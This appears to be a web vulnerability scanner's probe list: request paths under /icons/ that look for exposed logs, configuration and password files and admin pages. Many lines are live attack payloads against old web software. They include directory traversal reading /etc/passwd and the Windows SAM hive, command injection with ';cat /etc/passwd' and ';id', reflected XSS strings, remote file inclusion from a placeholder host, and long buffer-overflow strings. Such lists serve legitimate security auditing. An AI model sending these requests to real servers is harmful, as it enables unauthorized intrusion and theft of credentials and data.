AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
/icons/access.log
/icons/access_log
/icons/accounts.asp
/icons/ackcmdc.exe
/icons/action.php?action=addcomment
/icons/add_category.asp
/icons/admin.asp
/icons/admin.aspx
/icons/admin.cfg
/icons/admin.cfm
/icons/admin.cgi
/icons/admin.conf
/icons/admin.dat
/icons/admin.data
/icons/admin.db
/icons/admin.dbf
/icons/admin.exe
/icons/admin.htm
/icons/admin.html
/icons/admin.htx
/icons/admin.ini
/icons/admin.lst
/icons/admin.php
/icons/admin.php3
/icons/admin.pl
/icons/admin.pw
/icons/admin.shtml
/icons/admin.txt
/icons/admin.udl
/icons/admin/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/admins.htx
/icons/admin_/
/icons/admin_/help/..%255Cplsql.conf
/icons/adovbs.inc
/icons/adSamples/config/site.csc
/icons/advwedadmin/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:")|
/icons/alibaba.pl?|dir%20..\\..\\..\\..\\..\\..\\..\\,
/icons/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
/icons/allmanage.pl
/icons/allmanageup.pl
/icons/alya.cgi
/icons/amadmin.pl
/icons/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd
/icons/ans.pl?p=../../../../bin/command
/icons/application.cfm
/icons/architext_query.pl
/icons/asp/samples/viewcode.asp?file=index.asp
/icons/aspupload/Test11.asp
/icons/aspuploads/Test11.asp
/icons/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
/icons/baddir123/
/icons/badfile123
/icons/badfile123.html
/icons/batch_add.asp
/icons/batch_manage.asp
/icons/bbs.pl%3F+.htr
/icons/bb_smilies.php3
/icons/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/icons/bdir.htr
/icons/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/icons/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/icons/cgi-bin/htimage.exe?2,2
/icons/cgitest.exe?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/icons/ChangeLog
/icons/changelog.htm
/icons/changelog.html
/icons/CHANGELOG.txt
/icons/CHANGES
/icons/CHANGES.txt
/icons/changes.xml
/icons/changs.txt
/icons/cleanup.log
/icons/cleanup.txt
/icons/clients.htx
/icons/code.php
/icons/code.php3
/icons/common.inc
/icons/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
/icons/config.inc
/icons/configuration.inc
/icons/CONFIGURE
/icons/configure.txt
/icons/connect.asp?server=%3Cscript%3Ealert%2826712%29%3C%2Fscript%3E
/icons/connect.inc
/icons/connection.inc
/icons/content-space
/icons/Copy%20of%20README
/icons/Copy%20of%20README.html
/icons/Copy%20of%20small
/icons/COPYRIGHT.txt
/icons/core
/icons/counter.exe?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/CreatedByHP4
/icons/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/icons/customer.dbf
/icons/customers.dbf
/icons/CVS/
/icons/CVS/Entries
/icons/CVS/Repository
/icons/CVS/Root
/icons/dasp/fm_shell.asp
/icons/data.dbf
/icons/data.htm
/icons/data.html
/icons/data.txt
/icons/database.inc
/icons/datafunc.inc
/icons/db.dbf
/icons/db.inc
/icons/dbconfig.inc
/icons/dbconn.inc
/icons/dbsamp.htm
/icons/debug.asp
/icons/debug.cfg
/icons/debug.cgi
/icons/debug.dat
/icons/debug.htm
/icons/debug.html
/icons/debug.inc
/icons/debug.php
/icons/debug.php3
/icons/debug.pl
/icons/debug.txt
/icons/Default.asp
/icons/Default.aspx
/icons/deploy.exe
/icons/dir.txt
/icons/directory.php?dir=%3Bcat%20/etc/passwd
/icons/DirectoryListing.asp
/icons/dirs.txt
/icons/doexec.c
/icons/download.html
/icons/dvwssr.dll
/icons/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
/icons/EDM-ViewController-context-root/browse.do?act=%3CSCRIPT%3Ealert(xss);%3C/SCRIPT%3E&amp;select=1177281
/icons/email.txt
/icons/email_list.txt
/icons/email_template.txt
/icons/env.log
/icons/error.log
/icons/errors.log
/icons/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/icons/errors_log
/icons/error_log
/icons/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert(xss)%3c%2fscript%3e
/icons/examples/SendMailServlet
/icons/examples/servlet/SnoopServlet
/icons/examples/servlet/TroubleShooter
/icons/exchange/forms/ipm/note/cmpTitle.asp?tab=%22%2Balert%2826554%29%3B%7D%20setImportance%281%29%3B%3C%2Fscript%3E&att=0&imp=1
/icons/formprocessor.asp?MailTo=test@test.com&MailFrom=test@test.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/icons/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION
/icons/fuck.exe
/icons/functions.inc
/icons/gallery.php
/icons/GetFile.cfm
/icons/global.asa+.htr
/icons/global.asax+.htr
/icons/global.asax\
/icons/global.asa\
/icons/global.inc
/icons/globals.jsa
/icons/gnujsp/[dirname]/[file]
/icons/groupcp.php
/icons/hobbit.txt
/icons/Hosting/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/HostingController/sqlbrowse.asp?filepath=c:\&Opt=3
/icons/icons.ace
/icons/icons.arj
/icons/icons.gz
/icons/icons.lha
/icons/icons.lzh
/icons/icons.rar
/icons/icons.sln
/icons/icons.tar
/icons/icons.zip
/icons/iisadmin
/icons/iisadmin/bdir.htr
/icons/iisadmin/bdir.htr??c:\
/icons/iisadmin/bdir.htr?dir=ht??c:\
/icons/iisadmin/default.htm
/icons/iisadmin/ism.dll?http/dir
/icons/iisadmin/samples/ctgestb.htx
/icons/iisadmin/samples/ctgestb.idc
/icons/iisadmin/samples/details.htx
/icons/iisadmin/samples/details.idc
/icons/iisadmin/samples/query.htx
/icons/iisadmin/samples/query.idc
/icons/iisadmin/samples/register.htx
/icons/iisadmin/samples/register.idc
/icons/iisadmin/samples/sample.htx
/icons/iisadmin/samples/sample.idc
/icons/iisadmin/samples/sample2.htx
/icons/iisadmin/samples/sample2.idc
/icons/iisadmin/samples/viewbook.htx
/icons/iisadmin/samples/viewbook.idc
/icons/iisadmin/tools
/icons/iisadmin/tools/ct.htx
/icons/iisadmin/tools/ctss.idc
/icons/iisadmin/tools/dsnform.exe
/icons/iisadmin/tools/getdrvrs.exe
/icons/iisadmin/tools/mkilog.exe
/icons/iisadmin/tools/newdsn.exe
/icons/iisadminbdir.htr
/icons/IISADMPWD
/icons/iissamples/exair/howitworks/codebrws.asp?source=/msadc/../../../../../boot.ini
/icons/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/iissamples/sdk/asp/docs/%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./%c0%ae./winnt/win.ini%c0%80.asp
/icons/iissamples/sdk/asp/interaction/ServerVariables_Jscript.asp
/icons/include.inc
/icons/includes/functions/pmwh.php
/icons/index.js0x70
/icons/index.php3?vhosts=http://go.to
/icons/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc%2Fpasswd
/icons/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
/icons/info.txt
/icons/info2.txt
/icons/INSTALL
/icons/install.htm
/icons/INSTALL.html
/icons/install.log
/icons/INSTALL.mysql.txt
/icons/INSTALL.pgsql.txt
/icons/install.txt
/icons/install.xml
/icons/intranet.html
/icons/inventory.dbf
/icons/ipswitch.ini
/icons/issadmin/bdir.htr
/icons/LICENSE.txt
/icons/localstart.asp
/icons/log.asp
/icons/log.cgi
/icons/log.htm
/icons/log.html
/icons/log.php
/icons/login.asp
/icons/Login.aspx
/icons/login.dbf
/icons/Login.do
/icons/login.htx
/icons/login.php
/icons/logon.cgi
/icons/logon.htm
/icons/logon.html
/icons/logon.pl
/icons/logs.asp
/icons/logs.cgi
/icons/logs.htm
/icons/logs.html
/icons/logs.php
/icons/maintainers.txt
/icons/Makefile
/icons/members.dbf
/icons/mkilog.exe
/icons/mlog.phtml
/icons/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid
/icons/msadc/msadcs.dll
/icons/msadc/Samples/Selector/ShowCode.asp?source=/msadc/../../../../../boot.ini
/icons/nc.exe
/icons/netcat
/icons/netcat.c
/icons/netcat.exe
/icons/nonExistentPage.asp
/icons/nonExistentPage.aspx
/icons/nonExistentPage.cfm
/icons/nonExistentPage.cgi
/icons/nonExistentPage.html
/icons/nonExistentPage.jhtml
/icons/nonExistentPage.jsp
/icons/nonExistentPage.msp
/icons/nonExistentPage.nsf
/icons/nonExistentPage.php
/icons/nonExistentPage.php3
/icons/nonExistentPage.php4
/icons/nonExistentPage.pl
/icons/nonExistentPage.shtml
/icons/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root=<script>alert(xss)</script>
/icons/nph-test-cgi
/icons/NR/System/Access/ManualLogin.asp?REASONTXT=<script>alert(xss)</script>
/icons/ntdaddy.asp
/icons/null.htw?CiWebHitsFile=/default.htm&CiRestriction="<script>alert(xss)</script>"
/icons/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/icons/null.htw?CiWebHitsFile=/global.asax%20&CiRestriction=none&CiHiliteType=Full
/icons/null.htw?CiWebHitsFile=/index.htm&CiRestriction="<script>alert(xss)</script>"
/icons/null.htw?CiWebHitsFile=/index.html&CiRestriction="<script>alert(xss)</script>"
/icons/Old%20README
/icons/Old%20README.html
/icons/Old%20small
/icons/OldREADME
/icons/OldREADME.html
/icons/oldsmall
/icons/ora_errs.log
/icons/order.htm
/icons/order.html
/icons/order.txt
/icons/orders.asp
/icons/orders.dat
/icons/orders.htm
/icons/orders.html
/icons/orders.txt
/icons/Output-Build.txt
/icons/owalogon.asp
/icons/owa_util.listprint
/icons/owa_util.listprint?p_theQuery=SELECT%20*%20FROM%20SYS.TAB&p_cname=&p_nsize=
/icons/owa_util.showsource
/icons/owa_util.show_query_columns
/icons/owa_util.signature
/icons/page.cfm
/icons/pass.asp
/icons/pass.cfg
/icons/pass.cgi
/icons/pass.dat
/icons/pass.data
/icons/pass.db
/icons/pass.dbf
/icons/pass.exe
/icons/pass.htm
/icons/pass.html
/icons/pass.htx
/icons/pass.ini
/icons/pass.lst
/icons/pass.pl
/icons/pass.txt
/icons/pass/clients.htx
/icons/pass/pass.htx
/icons/pass/password.htx
/icons/pass/passwords.htx
/icons/pass/users.htx
/icons/passwd
/icons/passwd.txt
/icons/password
/icons/password.asp
/icons/password.cfg
/icons/password.cgi
/icons/password.dat
/icons/password.data
/icons/password.db
/icons/password.dbf
/icons/password.exe
/icons/password.htm
/icons/password.html
/icons/password.htx
/icons/password.ini
/icons/password.lst
/icons/password.pl
/icons/password.txt
/icons/passwords.asp
/icons/passwords.cfg
/icons/passwords.cgi
/icons/passwords.dat
/icons/passwords.data
/icons/passwords.db
/icons/passwords.dbf
/icons/passwords.exe
/icons/passwords.htm
/icons/passwords.html
/icons/passwords.htx
/icons/passwords.ini
/icons/passwords.lst
/icons/passwords.php3
/icons/passwords.pl
/icons/passwords.txt
/icons/pbserver/pbserver.dll?&&&&&&pb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/icons/persists/Test11.asp
/icons/php.exe?c:\boot.ini
/icons/php.exe?c:\winnt\repair\sam
/icons/php/mlog.phtml
/icons/php/mylog.phtml
/icons/php/php.exe?c:\boot.ini
